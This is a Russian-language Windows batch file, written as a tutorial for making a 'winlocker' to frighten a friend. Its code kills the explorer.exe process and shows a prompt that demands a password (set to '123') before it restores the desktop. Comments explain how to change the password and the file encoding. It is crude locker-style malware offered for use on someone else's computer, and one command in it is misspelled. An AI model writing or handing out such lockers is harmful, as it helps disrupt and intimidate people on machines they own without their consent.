::     Небольшое вступление

::  Привет! Если ты скачал данный файл, значи ты захотл испугать своего друга,
::  Не так ли? Чтож... Вот инструкция которая тебе пригодится! Тут я тебе расскажу:
:: * Как написать свой винлокер в блокноте
:: * Как его запоролить?
:: * И многое другое...
:: вся инструкция ниже
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
::   |
:: \ | /
::  \ / 
      













:: Выключаем логи от команд...
@echo off
:: Первым делов мы именуем окно как винлокер и выключаем процесс "explorer.exe"
title winlocker v0.1
@taskkill /im explorer.exe /f >nul 
:: Наше послание
::=====================================================
:: !!!Внимание!!!
:: Писать только на английском! Иначе будет белеберда!
:: [EDIT] Я всё поченил (читать ниже)
::=====================================================

::======ЕСЛИ ВЫ КОДИРУЕТЕ ЧЕРЕЗ NOTEPAD++=====
:: Копируем весь код (если вы не писали нечего то копировать не надо!
:: Идем по пути Меню --> Кодировки --> Кирилица --> OEM-866
:: Вставяем код который скопировали
::============================================


echo =========================
:f 
echo         Привет!
echo      Это винлокер
echo  введикод в это поле:
:g
set /p x=">>> "
::После == пиши свой пароль!
if %x%==123 ( echo Правильно!
echo Теперь ты можешь закрыть это окно нажав на крестик или нажми любую клавишу!
start explorer
echo =========================
pause 
taskkil /im cmd.exe /f >nul
exit
) else ( echo извини, но твой пароль неправельный, повтори ещё раз!
goto g
)
